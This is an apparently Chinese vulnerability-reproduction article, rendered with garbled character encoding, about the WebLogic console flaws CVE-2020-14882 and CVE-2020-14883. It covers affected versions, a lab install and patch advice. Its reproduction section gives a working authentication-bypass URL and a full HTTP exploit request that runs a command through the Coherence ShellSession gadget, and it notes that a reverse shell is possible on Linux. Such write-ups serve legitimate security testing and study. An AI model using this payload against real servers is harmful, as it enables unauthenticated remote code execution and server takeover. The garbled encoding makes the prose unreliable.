溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

發(fā)布時(shí)間:2021-12-28 17:31:04 來(lái)源:億速云 閱讀:285 作者:柒染 欄目:安全技術(shù)

今天就跟大家聊聊有關(guān)如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

0x00簡(jiǎn)介

WebLogic是美國(guó)Oracle公司出品的一個(gè)application server,確切的說(shuō)是一個(gè)基于JAVAEE架構(gòu)的中間件,WebLogic是用于開(kāi)發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫(kù)應(yīng)用的Java應(yīng)用服務(wù)器。將Java的動(dòng)態(tài)功能和Java Enterprise標(biāo)準(zhǔn)的安全性引入大型網(wǎng)絡(luò)應(yīng)用的開(kāi)發(fā)、集成、部署和管理之中。

Weblogic對(duì)比Tomcat如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

0x01漏洞概述

CVE-2020-14882: 代碼執(zhí)行漏洞

遠(yuǎn)程攻擊者可以構(gòu)造特殊的HTTP請(qǐng)求,在未經(jīng)身份驗(yàn)證的情況下接管 WebLogic Server Console,并在 WebLogic Server Console 執(zhí)行任意代碼。

CVE-2020-14883: 權(quán)限繞過(guò)漏洞

遠(yuǎn)程攻擊者可以構(gòu)造特殊的HTTP請(qǐng)求,在未經(jīng)身份驗(yàn)證的情況下接管 WebLogic Server Console。

0x02影響版本

Oracle:Weblogic:

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

0x03環(huán)境搭建

Windows2016+WebLogic12.2.1.4

1.在Oracle官方下載,WebLogic12.2.1.4版本

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

2.安裝weblogic需要java環(huán)境,這里java版本為jdk1.8.0_191

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

3.java環(huán)境安裝完成后使用管理員權(quán)限運(yùn)行WebLogic安裝

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

4.安裝時(shí)選擇下一步即可,在“安裝類(lèi)型”中選擇“含示例的完整安裝”

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

5.在配置向?qū)е?,設(shè)置密碼,點(diǎn)擊創(chuàng)建即可

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

6.安裝完成后,在瀏覽器訪問(wèn)127.0.0.1:7001/console 出現(xiàn)如下界面即可

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

0x04漏洞復(fù)現(xiàn)

1.CVE-2020-14883: 權(quán)限繞過(guò)漏洞

1.1 低權(quán)限的用戶訪問(wèn)以下URL,通過(guò)未授權(quán)訪問(wèn)到管理后臺(tái)頁(yè)面

http://192.168.207.149:7001/console/css/%252e%252e%252fconsole.portal如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

2. CVE-2020-14882: 代碼執(zhí)行漏洞

2.1 在首頁(yè)使用burp抓取數(shù)據(jù)包,然后發(fā)送到Repeater模塊構(gòu)造payload

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

2.2 在url處通過(guò)非法字符繞過(guò)訪問(wèn),然后通過(guò)Gadget調(diào)用命令執(zhí)行

Payload: /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)

完整數(shù)據(jù)包如下:

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1

Host: 192.168.207.149:7001

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ADMINCONSOLESESSION=_i6RW6CkwbR8Zr7DOmC0qhwkfhOdOVZiWlubIcjtgogLbSWVXCAl!-1560292457; think_lang=zh-cn; PHPSESSID=0701339d3e42f0edcf094f63a3919f90; JSESSIONID=z3-RYQeKtqCOmUfkcph5xyWXJWfYJQ-6E19wRWMHtS2JPtA14MaH!-1560292457

Connection: close

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

3. 點(diǎn)擊“發(fā)送”,在服務(wù)器稍等一下可以看到彈出了計(jì)算器

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析

注:在linux中可以通過(guò)構(gòu)造payload實(shí)現(xiàn)反彈shell

0x05修復(fù)建議

1. 在Oracle官方下載最新的漏洞補(bǔ)丁

https://support.oracle.com/portal/

看完上述內(nèi)容,你們對(duì)如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI